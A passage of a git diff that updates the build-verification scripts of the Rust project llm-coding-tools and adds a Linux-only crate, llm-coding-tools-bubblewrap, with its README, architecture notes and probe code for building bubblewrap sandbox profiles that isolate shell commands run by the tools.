$env:RUSTDOCFLAGS + $env:RUSTDOCFLAGS = "-D warnings" + try { + Invoke-LoggedCommand "cargo" (@("doc") + $docArgs) + } finally { + $env:RUSTDOCFLAGS = $originalRustdocFlags + } + + Write-Host "Formatting..." + Invoke-LoggedCommand "cargo" @("fmt", "--all", "--check", "--quiet") + + Write-Host "Linux-only feature coverage..." + if ($onLinux) { + Write-Host "Building (linux async features)..." + Invoke-LoggedCommand "cargo" @("build", "-p", "llm-coding-tools-bubblewrap", "--quiet") + Invoke-LoggedCommand "cargo" @("build", "-p", "llm-coding-tools-core", "--features", "linux-bubblewrap", "--quiet") + Invoke-LoggedCommand "cargo" @("build", "-p", "llm-coding-tools-serdesai", "--features", "linux-bubblewrap", "--quiet") + + Write-Host "Testing (linux async features)..." + Invoke-LoggedCommand "cargo" @("test", "-p", "llm-coding-tools-bubblewrap", "--quiet") + Invoke-LoggedCommand "cargo" @("test", "-p", "llm-coding-tools-core", "--features", "linux-bubblewrap", "--quiet") + Invoke-LoggedCommand "cargo" @("test", "-p", "llm-coding-tools-serdesai", "--features", "linux-bubblewrap", "--quiet") + + Write-Host "Clippy (linux async features)..." + Invoke-LoggedCommand "cargo" @("clippy", "-p", "llm-coding-tools-bubblewrap", "--quiet", "--", "-D", "warnings") + Invoke-LoggedCommand "cargo" @("clippy", "-p", "llm-coding-tools-core", "--features", "linux-bubblewrap", "--quiet", "--", "-D", "warnings") + Invoke-LoggedCommand "cargo" @("clippy", "-p", "llm-coding-tools-serdesai", "--features", "linux-bubblewrap", "--quiet", "--", "-D", "warnings") -Write-Host "Formatting..." -Invoke-LoggedCommand "cargo" @("fmt", "--all", "--check", "--quiet") + Write-Host "Building (linux blocking features)..." + Invoke-LoggedCommand "cargo" @("build", "-p", "llm-coding-tools-bubblewrap", "--no-default-features", "--features", "blocking", "--quiet") + Invoke-LoggedCommand "cargo" @("build", "-p", "llm-coding-tools-core", "--no-default-features", "--features", "blocking,linux-bubblewrap", "--quiet") -Write-Host "Publish dry-run..." -Invoke-LoggedCommand "cargo" @("publish", "--dry-run", "--allow-dirty", "-p", "llm-coding-tools-core", "--quiet") -Invoke-LoggedCommand "cargo" @("publish", "--dry-run", "--allow-dirty", "-p", "llm-coding-tools-agents", "--quiet") -Invoke-LoggedCommand "cargo" @("publish", "--dry-run", "--allow-dirty", "-p", "llm-coding-tools-serdesai", "--quiet") -Invoke-LoggedCommand "cargo" @("publish", "--dry-run", "--allow-dirty", "-p", "llm-coding-tools-models-dev", "--quiet") + Write-Host "Testing (linux blocking features)..." + Invoke-LoggedCommand "cargo" @("test", "-p", "llm-coding-tools-bubblewrap", "--no-default-features", "--features", "blocking", "--quiet") + Invoke-LoggedCommand "cargo" @("test", "-p", "llm-coding-tools-core", "--no-default-features", "--features", "blocking,linux-bubblewrap", "--quiet") + + Write-Host "Clippy (linux blocking features)..." + Invoke-LoggedCommand "cargo" @("clippy", "-p", "llm-coding-tools-bubblewrap", "--no-default-features", "--features", "blocking", "--quiet", "--", "-D", "warnings") + Invoke-LoggedCommand "cargo" @("clippy", "-p", "llm-coding-tools-core", "--no-default-features", "--features", "blocking,linux-bubblewrap", "--quiet", "--", "-D", "warnings") + + Write-Host "Docs (linux-only package)..." + $linuxRustdocFlags = $env:RUSTDOCFLAGS + $env:RUSTDOCFLAGS = "-D warnings" + try { + Invoke-LoggedCommand "cargo" @("doc", "-p", "llm-coding-tools-bubblewrap", "--document-private-items", "--no-deps", "--quiet") + } finally { + $env:RUSTDOCFLAGS = $linuxRustdocFlags + } + } else { + Write-Host " (skipped - not Linux)" + } -Write-Host "All checks passed!" + Write-Host "All checks passed!" } finally { Set-Location $originalDir diff --git a/src/.cargo/verify.sh b/src/.cargo/verify.sh index 36ff4728..55fafdb8 100755 --- a/src/.cargo/verify.sh +++ b/src/.cargo/verify.sh @@ -5,6 +5,8 @@ # # Note: llm-coding-tools-serdesai is async-only. # Blocking mode is validated for core and models-dev. +# llm-coding-tools-bubblewrap is Linux-only; all bubblewrap steps +# are skipped on non-Linux platforms. set -e @@ -20,38 +22,82 @@ cd "$PROJECT_ROOT" trap 'cd "$ORIGINAL_DIR"' EXIT -echo "Building..." +IS_LINUX=false +if [ "$(uname -s)" = "Linux" ]; then + IS_LINUX=true +fi + +echo "Building (async features)..." run_cmd cargo build -p llm-coding-tools-core --quiet run_cmd cargo build -p llm-coding-tools-agents --quiet run_cmd cargo build -p llm-coding-tools-serdesai --quiet run_cmd cargo build -p llm-coding-tools-models-dev --quiet -echo "Testing..." +echo "Testing (async features)..." run_cmd cargo test -p llm-coding-tools-core --quiet run_cmd cargo test -p llm-coding-tools-agents --quiet run_cmd cargo test -p llm-coding-tools-serdesai --quiet run_cmd cargo test -p llm-coding-tools-models-dev --quiet -echo "Clippy..." +echo "Clippy (async features)..." run_cmd cargo clippy -p llm-coding-tools-core --quiet -- -D warnings run_cmd cargo clippy -p llm-coding-tools-agents --quiet -- -D warnings run_cmd cargo clippy -p llm-coding-tools-serdesai --quiet -- -D warnings run_cmd cargo clippy -p llm-coding-tools-models-dev --quiet -- -D warnings -echo "Testing blocking feature..." +echo "Building (blocking feature)..." +run_cmd cargo build -p llm-coding-tools-core --no-default-features --features blocking --quiet +run_cmd cargo build -p llm-coding-tools-models-dev --no-default-features --features blocking --quiet + +echo "Testing (blocking feature)..." run_cmd cargo test -p llm-coding-tools-core --no-default-features --features blocking --quiet run_cmd cargo test -p llm-coding-tools-models-dev --no-default-features --features blocking --quiet +echo "Clippy (blocking feature)..." +run_cmd cargo clippy -p llm-coding-tools-core --no-default-features --features blocking --quiet -- -D warnings +run_cmd cargo clippy -p llm-coding-tools-models-dev --no-default-features --features blocking --quiet -- -D warnings + echo "Docs..." -run_cmd env RUSTDOCFLAGS="-D warnings" cargo doc --workspace --document-private-items --no-deps --quiet +DOC_ARGS=(--workspace --document-private-items --no-deps --quiet --exclude llm-coding-tools-bubblewrap) +run_cmd env RUSTDOCFLAGS="-D warnings" cargo doc "${DOC_ARGS[@]}" echo "Formatting..." run_cmd cargo fmt --all --check --quiet -echo "Publish dry-run..." -run_cmd cargo publish --dry-run --allow-dirty -p llm-coding-tools-core --quiet -run_cmd cargo publish --dry-run --allow-dirty -p llm-coding-tools-agents --quiet -run_cmd cargo publish --dry-run --allow-dirty -p llm-coding-tools-serdesai --quiet -run_cmd cargo publish --dry-run --allow-dirty -p llm-coding-tools-models-dev --quiet +echo "Linux-only feature coverage..." +if [ "$IS_LINUX" = true ]; then + echo "Building (linux async features)..." + run_cmd cargo build -p llm-coding-tools-bubblewrap --quiet + run_cmd cargo build -p llm-coding-tools-core --features linux-bubblewrap --quiet + run_cmd cargo build -p llm-coding-tools-serdesai --features linux-bubblewrap --quiet + + echo "Testing (linux async features)..." + run_cmd cargo test -p llm-coding-tools-bubblewrap --quiet + run_cmd cargo test -p llm-coding-tools-core --features linux-bubblewrap --quiet + run_cmd cargo test -p llm-coding-tools-serdesai --features linux-bubblewrap --quiet + + echo "Clippy (linux async features)..." + run_cmd cargo clippy -p llm-coding-tools-bubblewrap --quiet -- -D warnings + run_cmd cargo clippy -p llm-coding-tools-core --features linux-bubblewrap --quiet -- -D warnings + run_cmd cargo clippy -p llm-coding-tools-serdesai --features linux-bubblewrap --quiet -- -D warnings + + echo "Building (linux blocking features)..." + run_cmd cargo build -p llm-coding-tools-bubblewrap --no-default-features --features blocking --quiet + run_cmd cargo build -p llm-coding-tools-core --no-default-features --features blocking,linux-bubblewrap --quiet + + echo "Testing (linux blocking features)..." + run_cmd cargo test -p llm-coding-tools-bubblewrap --no-default-features --features blocking --quiet + run_cmd cargo test -p llm-coding-tools-core --no-default-features --features blocking,linux-bubblewrap --quiet + + echo "Clippy (linux blocking features)..." + run_cmd cargo clippy -p llm-coding-tools-bubblewrap --no-default-features --features blocking --quiet -- -D warnings + run_cmd cargo clippy -p llm-coding-tools-core --no-default-features --features blocking,linux-bubblewrap --quiet -- -D warnings + + echo "Docs (linux-only package)..." + run_cmd env RUSTDOCFLAGS="-D warnings" cargo doc -p llm-coding-tools-bubblewrap --document-private-items --no-deps --quiet + +else + echo " (skipped - not Linux)" +fi echo "All checks passed!" diff --git a/src/Cargo.lock b/src/Cargo.lock index 1b4625ca..4a876d55 100644 --- a/src/Cargo.lock +++ b/src/Cargo.lock @@ -1993,6 +1993,18 @@ dependencies = [ "thiserror 2.0.18", ] +[[package]] +name = "llm-coding-tools-bubblewrap" +version = "0.1.0" +dependencies = [ + "parking_lot", + "process-wrap", + "serial_test", + "tempfile", + "thiserror 2.0.18", + "tokio", +] + [[package]] name = "llm-coding-tools-core" version = "0.2.0" @@ -2011,6 +2023,7 @@ dependencies = [ "ignore", "indoc", "lite-strtab", + "llm-coding-tools-bubblewrap", "maybe-async", "memchr", "parking_lot", @@ -2019,6 +2032,7 @@ dependencies = [ "schemars", "serde", "serde_json", + "serial_test", "temp-env", "tempfile", "thiserror 2.0.18", @@ -2057,6 +2071,7 @@ dependencies = [ "futures", "indexmap", "llm-coding-tools-agents", + "llm-coding-tools-bubblewrap", "llm-coding-tools-core", "llm-coding-tools-models-dev", "reqwest 0.13.1", @@ -2065,6 +2080,7 @@ dependencies = [ "serdes-ai", "serdes-ai-models", "serdes-ai-streaming", + "serial_test", "temp-env", "tempfile", "thiserror 2.0.18", diff --git a/src/Cargo.toml b/src/Cargo.toml index ff11d282..479e530f 100644 --- a/src/Cargo.toml +++ b/src/Cargo.toml @@ -1,7 +1,13 @@ [workspace] resolver = "2" -members = ["llm-coding-tools-core", "llm-coding-tools-serdesai", "llm-coding-tools-agents", "llm-coding-tools-models-dev"] +members = [ + "llm-coding-tools-core", + "llm-coding-tools-serdesai", + "llm-coding-tools-agents", + "llm-coding-tools-models-dev", + "llm-coding-tools-bubblewrap", +] # Profile Build [profile.profile] diff --git a/src/llm-coding-tools-bubblewrap/ARCHITECTURE.md b/src/llm-coding-tools-bubblewrap/ARCHITECTURE.md new file mode 100644 index 00000000..c9b98da5 --- /dev/null +++ b/src/llm-coding-tools-bubblewrap/ARCHITECTURE.md @@ -0,0 +1,156 @@ +# Architecture: llm-coding-tools-bubblewrap + +Linux-only library that builds bubblewrap sandbox profiles, probes host +capabilities, and produces wrapped command lines. + +For the security model, see [SANDBOX-PROFILES.md](../../SANDBOX-PROFILES.md). + +## File Map + +``` +llm-coding-tools-bubblewrap +├── lib.rs crate root, re-exports, Linux-only gate +├── error.rs LinuxBwrapError +├── probe.rs bwrap detection & shell resolution (cached) +├── path_util.rs normalize_path helper +├── profile/ +│ ├── mod.rs module root; re-exports public API surface +│ ├── types.rs Profile, Preset, TmpBacking, Availability, etc. +│ ├── builder.rs Builder + build() + static arg precomputation +│ ├── presets.rs public_bot() & trusted_maintenance() constructors +│ ├── validation.rs path/symlink/env/tmp validators +│ └── layout.rs SandboxLayout — "is this host path visible inside?" +├── wrap/ +│ ├── mod.rs module root; cfg(feature) gates, re-exports +│ ├── command.rs wrap_command → LinuxBwrapWrappedCommand +│ ├── tokio.rs async CommandWrap (feature "tokio") +│ └── blocking.rs sync CommandWrap (feature "blocking") +└── test_helpers.rs fake bwrap/shell fixtures (cfg(test)) +``` + +## Building a Profile + +``` + Builder::public_bot() Builder::trusted_maintenance() Builder::new() + or any with_*() chain + │ + │ .build() + ▼ + ┌─────────────────────────────────────────────────────────┐ + │ 0. ensure cache root subdirs (when cache root mounted) │ + │ 1. validate paths, env, symlinks, tmp, creds, │ + │ mounts, tmpfs overlays │ + │ 2. resolve bwrap binary (probe.rs, cached) │ + │ 3. resolve visible shell (builder.rs + layout.rs) │ + │ 4. precompute static bwrap argv │ + └───────────────────────────┬─────────────────────────────┘ + │ + ▼ + ┌──────────┐ + │ Profile │ frozen, Clone, thread-safe + └──────────┘ +``` + +## Using a Profile + +Pass the `Profile` to `wrap_command` directly, or use an adapter: + +``` + ┌──────────┐ + │ Profile │ + └────┬─────┘ + │ + ┌──────────┼──────────┐ + ▼ │ ▼ + tokio:: │ blocking:: + build_command_wrap │ build_command_wrap + (async CommandWrap)│ (sync CommandWrap) + │ │ │ + └──────────┼──────────┘ + ▼ + wrap_command() → LinuxBwrapWrappedCommand (argv iterator) +``` + +## What build() Does + +``` + ensure cache dirs ──► validate ──► find bwrap ──► find shell ──► build static args + │ │ │ │ │ + validation.rs validation.rs probe.rs builder.rs + builder.rs + (when cache + builder.rs (cached) layout.rs (one-time + root mounted) (creds) (visibility) precompute) +``` + +Result: a `Profile` with `static_args: Arc<[OsString]>` containing the full +bwrap prefix (flags, mounts, env). `wrap_command` only appends `--chdir + -- -c `. + +## Two Presets at a Glance + +| | PublicBot | TrustedMaintenance | +| ------------------ | -------------------------- | ------------------------------ | +| Network | off (`--unshare-net`) | on | +| Host filesystem | selective read-only mounts | full `/` read-only | +| Writable areas | workspace, home, `/tmp` | workspace, home, cache, `/tmp` | +| `/etc/shadow` | hidden (not mounted) | hidden (file overlay) | +| Cache root | not mounted | bind-mounted | +| Env | cleared, sanitized PATH | cleared, PATH + XDG + TMPDIR | +| Safe for untrusted | yes | no | + +## Path Visibility (layout.rs) + +When `wrap_command` needs to translate a host working directory to a sandbox +path, `SandboxLayout::classify` walks the mount tree: + +``` +host_path + ├── under workspace? → remap workspace → workspace_dest + ├── under synthetic_home? → remap home → home_dest + ├── under BindHost tmp? → remap to /tmp + ├── under cache_root? → same path (if mounted) + ├── in ro/rw mounts? → same path + ├── ro-host-rootfs? → same path (unless tmpfs overlay hides it) + └── else → hidden (error) +``` + +Same logic is used at `build()` time to find a shell that's actually visible +inside the sandbox. + +## Probe Cache (probe.rs) + +`probe_backend_uncached()` spawns `bwrap --version` then a minimal sandbox to verify +namespace support. `probe_backend()` caches results in a `OnceLock>` +keyed on `$PATH` — a changed PATH invalidates the cache. + +Shell search order: `bash` on PATH → `sh` on PATH → hardcoded candidates +(Nix, FHS) → deduplicated by resolved path. + +## Error Model + +``` +LinuxBwrapError +├── InvalidPath(String) bad path, bad env name/value, bad symlink, +│ bad credential mount, bad tmp backing, +│ cache subdir I/O failure, invisible workdir +└── Execution(String) bwrap missing, bwrap broken, no visible shell, unavailable +``` + +All validation fails at `build()`. `wrap_command` can only fail on a bad +per-call working directory. + +## Feature Flags + +``` +(default) → wrap_command only (no process-wrap dependency) +tokio → wrap::tokio::build_command_wrap (process-wrap tokio1, process-group) +blocking → wrap::blocking::build_command_wrap (process-wrap std, process-group) +``` + +Both execution adapters set stdin=null, stdout/stderr=piped, and wrap with +`ProcessGroup::leader()` for clean signal handling. + +## Testing + +Fake `bwrap` and `bash` scripts in temp dirs with managed `$PATH`. Tests +that touch `$PATH` run `#[serial]` to avoid cache contamination. No real +bubblewrap installation needed. diff --git a/src/llm-coding-tools-bubblewrap/Cargo.toml b/src/llm-coding-tools-bubblewrap/Cargo.toml new file mode 100644 index 00000000..f07e549b --- /dev/null +++ b/src/llm-coding-tools-bubblewrap/Cargo.toml @@ -0,0 +1,24 @@ +[package] +name = "llm-coding-tools-bubblewrap" +version = "0.1.0" +edition = "2021" +description = "Linux bubblewrap sandbox profiles, probing, and execution for llm-coding-tools" +repository = "https://github.com/Sewer56/llm-coding-tools" +license = "Apache-2.0" +include = ["src/**/*", "README.md"] +readme = "README.md" + +[features] +default = ["tokio"] +tokio = ["dep:process-wrap", "process-wrap/tokio1", "process-wrap/process-group"] +blocking = ["dep:process-wrap", "process-wrap/std", "process-wrap/process-group"] + +[dependencies] +parking_lot = "0.12" +thiserror = "2.0" +process-wrap = { version = "9", default-features = false, optional = true } + +[dev-dependencies] +serial_test = "3" +tempfile = "3.27" +tokio = { version = "1.50", features = ["rt", "macros"] } diff --git a/src/llm-coding-tools-bubblewrap/README.md b/src/llm-coding-tools-bubblewrap/README.md new file mode 100644 index 00000000..38105d0d --- /dev/null +++ b/src/llm-coding-tools-bubblewrap/README.md @@ -0,0 +1,158 @@ +# llm-coding-tools-bubblewrap + +Builds bubblewrap profiles, availability checks, and wrapped commands for `llm-coding-tools`. + +**Linux only.** + +## Main Types + +- [`Builder`] - Builds a bubblewrap profile. +- [`Profile`] - A validated bubblewrap profile ready for reuse. +- [`Availability::detect`] - Checks whether `bwrap` can run. +- [`wrap::wrap_command`] - Builds a `bwrap` command from a profile. +- `tokio::build_command_wrap` - Builds the async wrapped command. +- `blocking::build_command_wrap` - Builds the blocking wrapped command. + +## Feature Flags + +- `tokio`: enables `tokio::build_command_wrap`. +- `blocking`: enables `blocking::build_command_wrap`. + +## Usage + +### Building a Profile + +```rust,no_run +use llm_coding_tools_bubblewrap::{ + Preset, Builder, TmpBacking, +}; +use std::path::Path; + +fn main() -> Result<(), llm_coding_tools_bubblewrap::LinuxBwrapError> { +let profile = Builder::public_bot( + Path::new("/host/workspace"), // workspace: host directory mounted into the sandbox + Path::new("/tmp/sandbox-home"), // synthetic_home: host dir mounted as $HOME (/home/sandbox) inside the sandbox + Path::new("/tmp/sandbox-cache"), // cache_root: host cache root used for sandbox cache/state dirs + Some(TmpBacking::Tmpfs), // tmp_backing: how sandbox /tmp is backed (RAM or host dir) +) +.build()?; + +assert_eq!(profile.preset(), Some(Preset::PublicBot)); + Ok(()) +} +``` + +### Detecting Availability + +```rust,no_run +use llm_coding_tools_bubblewrap::Availability; + +match Availability::detect() { + Availability::Available => { + println!("sandbox is ready"); + } + Availability::Unavailable { reason } => { + eprintln!("sandbox unavailable: {reason}"); + } + Availability::Unknown => { + println!("availability not checked"); + } +} +``` + +### Wrapping a Command + +```rust,no_run +use llm_coding_tools_bubblewrap::{ + wrap, Preset, Builder, TmpBacking, +}; +use std::path::Path; + +fn main() -> Result<(), llm_coding_tools_bubblewrap::LinuxBwrapError> { +let profile = Builder::public_bot( + Path::new("/host/workspace"), // workspace: host directory mounted into the sandbox + Path::new("/tmp/sandbox-home"), // synthetic_home: host dir mounted as $HOME (/home/sandbox) inside the sandbox + Path::new("/tmp/sandbox-cache"), // cache_root: host cache root used for sandbox cache/state dirs + Some(TmpBacking::Tmpfs), // tmp_backing: how sandbox /tmp is backed (RAM or host dir) +) +.build()?; + +let wrapped = wrap::wrap_command( + &profile, // profile: validated profile from Builder::build() + "echo hello", // command: shell command string to execute + None, // workdir: host working directory (None = use workspace) +).unwrap(); +assert!(wrapped.program().ends_with("bwrap")); + Ok(()) +} +``` + +### Running with Tokio + +```text +// tokio::build_command_wrap(&profile, command, workdir) +// profile: validated Profile +// command: shell command string to execute +// workdir: host working directory (None = use workspace) +``` +See `tokio::build_command_wrap` (requires `tokio` feature). + +### Running with Blocking + +```text +// blocking::build_command_wrap(&profile, command, workdir) +// profile: validated Profile +// command: shell command string to execute +// workdir: host working directory (None = use workspace) +``` +See `blocking::build_command_wrap` (requires `blocking` feature). + +## Presets + +- [`Preset::PublicBot`] - Safer defaults for untrusted input. Uses a + synthetic home, a cleaned `PATH`, read-only system mounts, optional RAM-backed + `/tmp`, and no network. +- [`Preset::TrustedMaintenance`] - Broader defaults for trusted jobs. + Uses a read-only host root, a cleaned `PATH`, writable overlays, host-backed + `/tmp`, and keeps network on. + +`TrustedMaintenance` is only for trusted jobs. A command can send out any data +it can read. + +Preset helpers return a builder, so you can still change paths, mounts, and env +vars before calling `.build()`. That build step validates profile-owned inputs +and precomputes the reusable `bwrap` argv prefix. + +[`TmpBacking::Tmpfs`] keeps sandbox `/tmp` in memory. Use +[`TmpBacking::BindHost`] to mount a host directory at `/tmp`. + +[`wrap::wrap_command`] tries a visible host `bash` first and falls back to `sh`. +On Nix systems that is often under `/nix/store/...`. On FHS systems it is often +under `/usr/bin` or `/bin`. + +[`Preset::PublicBot`] filters out user-home, temp, wrapper, and +per-user profile directories from the inherited `PATH`. +[`Preset::TrustedMaintenance`] keeps more host `PATH` entries, but +still drops entries under directories hidden by the profile. + +For more details on sandbox profiles and trade-offs, see +[SANDBOX-PROFILES.md](https://github.com/Sewer56/llm-coding-tools/blob/main/SANDBOX-PROFILES.md). + +## Builder Lists + +Setters like `with_read_only_mounts` replace the whole list. They do not append. +That keeps the builder state easy to read. + +## Errors + +- Missing `bwrap` is reported clearly. +- Environments that cannot create a sandbox are reported clearly. +- Invalid profile-owned paths and invalid credential mounts are rejected at build time. +- Invalid per-command working directories are rejected before spawn. + +For the internal architecture and module layout, see [ARCHITECTURE.md](ARCHITECTURE.md). + +[`Availability::detect`]: crate::Availability::detect +[`Profile`]: crate::Profile +[`Builder`]: crate::Builder +[`wrap::wrap_command`]: crate::wrap::wrap_command diff --git a/src/llm-coding-tools-bubblewrap/src/error.rs b/src/llm-coding-tools-bubblewrap/src/error.rs new file mode 100644 index 00000000..0c10936a --- /dev/null +++ b/src/llm-coding-tools-bubblewrap/src/error.rs @@ -0,0 +1,16 @@ +//! Error types for bubblewrap sandbox setup and execution. + +use thiserror::Error; + +/// Errors returned while validating or planning a bubblewrap command line. +#[derive(Debug, Error)] +pub enum LinuxBwrapError { + /// A caller-provided path (working directory, mount source or destination, + /// or tmp backing directory) is invalid or unreachable inside the sandbox. + #[error("{0}")] + InvalidPath(String), + /// The `bwrap` binary could not be found on `PATH` or no usable host shell + /// is visible inside the sandbox. + #[error("{0}")] + Execution(String), +} diff --git a/src/llm-coding-tools-bubblewrap/src/lib.rs b/src/llm-coding-tools-bubblewrap/src/lib.rs new file mode 100644 index 00000000..5d11ccae --- /dev/null +++ b/src/llm-coding-tools-bubblewrap/src/lib.rs @@ -0,0 +1,19 @@ +#![doc = include_str!(concat!("../", env!("CARGO_PKG_README")))] + +#[cfg(not(target_os = "linux"))] +compile_error!("llm-coding-tools-bubblewrap is only supported on Linux"); + +mod error; +mod path_util; +mod probe; +pub mod profile; +pub mod wrap; + +#[cfg(test)] +mod test_helpers; + +pub use error::LinuxBwrapError; +pub use profile::{ + Availability, Builder, EnvVar, FileMount, NetworkPolicy, Preset, Profile, Symlink, TmpBacking, +}; +pub use wrap::LinuxBwrapWrappedCommand; diff --git a/src/llm-coding-tools-bubblewrap/src/path_util.rs b/src/llm-coding-tools-bubblewrap/src/path_util.rs new file mode 100644 index 00000000..39a90953 --- /dev/null +++ b/src/llm-coding-tools-bubblewrap/src/path_util.rs @@ -0,0 +1,15 @@ +//! Crate-private path utilities for preparing filesystem paths before sandbox use. +//! +//! Callers in [`probe`](crate::probe) and [`profile`](crate::profile) use these +//! helpers to normalize paths so that comparisons and bind-mount targets are +//! consistent regardless of symlinks or relative components. + +use std::fs; +use std::path::Path; + +/// Canonicalizes `path` when possible and otherwise preserves the original. +pub(crate) fn normalize_path(path: &Path) -> Box { + fs::canonicalize(path) + .unwrap_or_else(|_| path.to_path_buf()) + .into_boxed_path() +} diff --git a/src/llm-coding-tools-bubblewrap/src/probe.rs b/src/llm-coding-tools-bubblewrap/src/probe.rs new file mode 100644 index 00000000..60f0af4d --- /dev/null +++ b/src/llm-coding-tools-bubblewrap/src/probe.rs @@ -0,0 +1,404 @@ +//! Checks whether `bwrap` can run. +//! +//! Most callers should use [`crate::profile::Availability::detect`]. + +use crate::path_util::normalize_path; +use crate::{Availability, LinuxBwrapError, Preset}; +use parking_lot::RwLock; +use std::env; +use std::ffi::OsString; +use std::path::{Path, PathBuf}; +use std::process::{Command, Output, Stdio}; +use std::sync::Arc; +use std::sync::OnceLock; + +/// A no-op shell command used as the probe payload. +const PROBE_COMMAND: &str = ":"; +/// Sentinel argument appended to the probe command to distinguish its logs. +pub(crate) const PROBE_ARG0: &str = "__llm_coding_tools_bwrap_probe__"; +/// Absolute paths checked when `PATH` lookups for `bash`/`sh` yield nothing. +const SHELL_CANDIDATES: &[&str] = &[ + "/run/current-system/sw/bin/bash", + "/nix/var/nix/profiles/default/bin/bash", + "/usr/bin/bash", + "/bin/bash", + "/run/current-system/sw/bin/sh", + "/nix/var/nix/profiles/default/bin/sh", + "/usr/bin/sh", + "/bin/sh", +]; + +/// Outcome of probing the host for a working `bwrap` binary. +#[derive(Clone, Debug)] +enum LinuxBwrapBackend { + /// `bwrap` was found and successfully created a sandbox. + Available { bwrap: Arc }, + /// No `bwrap` binary exists on `PATH`. + MissingBinary { reason: Box }, + /// `bwrap` exists but the environment cannot run sandboxes (e.g. missing namespaces). + Unusable { reason: Box }, +} + +/// Returns whether `bwrap` is usable on this host. +/// +/// Results are cached per `PATH` value within the process lifetime. +pub(crate) fn probe_availability() -> Availability { + match probe_backend() { + LinuxBwrapBackend::Available { .. } => Availability::Available, + LinuxBwrapBackend::MissingBinary { reason } | LinuxBwrapBackend::Unusable { reason } => { + Availability::Unavailable { reason } + } + } +} + +/// Returns the path to `bwrap` or an error explaining why it cannot be used. +/// +/// If `availability` already indicates unavailability, returns early without +/// probing again. Otherwise re-checks the host and returns an [`Arc`] on +/// success or a [`LinuxBwrapError::Execution`] on failure. +pub(crate) fn resolve_backend_or_error_for( + preset: Option, + availability: &Availability, +) -> Result, LinuxBwrapError> { + if let Some(reason) = availability.reason() { + return Err(LinuxBwrapError::Execution(format!( + "linux sandbox profile {} is unavailable: {}", + profile_name(preset), + reason, + ))); + } + + match probe_backend() { + LinuxBwrapBackend::Available { bwrap } => Ok(bwrap), + LinuxBwrapBackend::MissingBinary { reason } => Err(LinuxBwrapError::Execution(format!( + "linux sandbox profile {} requires bubblewrap (`bwrap`), but no usable binary was found: {}", + profile_name(preset), + reason, + ))), + LinuxBwrapBackend::Unusable { reason } => Err(LinuxBwrapError::Execution(format!( + "linux sandbox profile {} requires bubblewrap (`bwrap`), but the current environment cannot create a sandbox: {}", + profile_name(preset), + reason, + ))), + } +} + +fn profile_name(preset: Option) -> &'static str { + match preset { + Some(Preset::PublicBot) => "PublicBot", + Some(Preset::TrustedMaintenance) => "TrustedMaintenance", + None => "Custom", + } +} + +/// Searches `PATH` directories for a file named `name` and returns the first match. +pub(crate) fn find_binary_on_path(name: &str) -> Option> { + let path = env::var_os("PATH")?; + for dir in env::split_paths(&path) { + if !dir.is_absolute() || dir.as_os_str().is_empty() { + continue; + } + let candidate = dir.join(name); + if candidate.is_file() { + return Some(candidate.into_boxed_path()); + } + } + None +} + +/// Returns the first shell binary for which `classify` returns [`Some`], +/// checking `PATH` first then the hardcoded [`SHELL_CANDIDATES`]. +/// +/// On success the host path and the classifier's return value are yielded +/// together so the caller need not re-classify. +pub(crate) fn first_shell_candidate_with(mut classify: F) -> Option<(Box, R)> +where + F: FnMut(&Path) -> Option, +{ + for name in ["bash", "sh"] { + if let Some(path) = find_binary_on_path(name) { + let path = normalize_path(path.as_ref()); + if let Some(r) = classify(path.as_ref()) { + return Some((path, r)); + } + } + } + for candidate in SHELL_CANDIDATES { + let path = PathBuf::from(candidate); + if path.is_file() { + let path = normalize_path(&path); + if let Some(r) = classify(path.as_ref()) { + return Some((path, r)); + } + } + } + None +} + +/// Returns any available host shell (`bash` preferred, then `sh`). +pub(crate) fn resolve_host_shell() -> Option> { + first_shell_candidate_with(|_| Some(())).map(|(path, _)| path) +} + +fn probe_backend() -> LinuxBwrapBackend { + // Cache keyed on PATH: a changed PATH invalidates the result. + #[allow(clippy::type_complexity)] + static CACHE: OnceLock, LinuxBwrapBackend)>>> = OnceLock::new(); + + let path = env::var_os("PATH"); + let cache = CACHE.get_or_init(|| RwLock::new(None)); + + { + let cache = cache.read(); + if let Some((cached_path, cached_backend)) = cache.as_ref() { + if cached_path == &path { + return cached_backend.clone(); + } + } + } + + let backend = probe_backend_uncached(); + *cache.write() = Some((path, backend.clone())); + backend +} + +/// Checks `bwrap` without using the cache. +/// +/// The probe binds the host root read-only and runs a tiny shell command. That +/// checks both namespace support and shell visibility on FHS and Nix systems. +fn probe_backend_uncached() -> LinuxBwrapBackend { + let Some(bwrap) = find_binary_on_path("bwrap") else { + return LinuxBwrapBackend::MissingBinary { + reason: Box::from("`bwrap` was not found on PATH"), + }; + }; + + let version = Command::new(bwrap.as_os_str()) + .arg("--version") + .stdin(Stdio::null()) + .stdout(Stdio::null()) + .stderr(Stdio::piped()) + .output(); + let Ok(version) = version else { + return LinuxBwrapBackend::MissingBinary { + reason: format!("failed to execute {}", bwrap.display()).into_boxed_str(), + }; + }; + if !version.status.success() { + return LinuxBwrapBackend::Unusable { + reason: probe_failure_reason(&version, "`bwrap --version` failed"), + }; + } + + let Some(shell) = resolve_host_shell() else { + return LinuxBwrapBackend::Unusable { + reason: Box::from("no usable host shell (`bash` or `sh`) was found"), + }; + }; + + // Verify that bwrap can actually create namespaces by running a minimal + // sandbox (host root read-only, no-op command). Finding the binary on PATH + // is not enough; the process may lack user-namespace capabilities. + // PROBE_ARG0 appears as $0 so the probe is identifiable in logs/audit. + let probe = Command::new(bwrap.as_os_str()) + .args([ + "--die-with-parent", + "--new-session", + "--proc", + "/proc", + "--dev", + "/dev", + "--ro-bind", + "/", + "/", + "--", + ]) + .arg(shell.as_os_str()) + .arg("-c") + .arg(PROBE_COMMAND) + .arg(PROBE_ARG0) + .stdin(Stdio::null()) + .stdout(Stdio::null()) + .stderr(Stdio::piped()) + .output(); + + match probe { + Ok(output) if output.status.success() => LinuxBwrapBackend::Available { + bwrap: Arc::from(bwrap), + }, + Ok(output) => LinuxBwrapBackend::Unusable { + reason: probe_failure_reason(&output, "bubblewrap probe failed"), + }, + Err(error) => LinuxBwrapBackend::Unusable { + reason: format!("failed to execute bubblewrap probe: {error}").into_boxed_str(), + }, + } +} + +/// Extracts a human-readable failure reason from a failed process output. +/// +/// Prefers the process stderr; falls back to `fallback` plus the exit status +/// when stderr is empty. +fn probe_failure_reason(output: &Output, fallback: &str) -> Box { + let stderr = String::from_utf8_lossy(&output.stderr); + let trimmed = stderr.trim(); + if trimmed.is_empty() { + format!("{fallback} (exit status: {})", output.status).into_boxed_str() + } else { + trimmed.to_owned().into_boxed_str() + } +} + +#[cfg(test)] +mod tests { + use super::*; + use 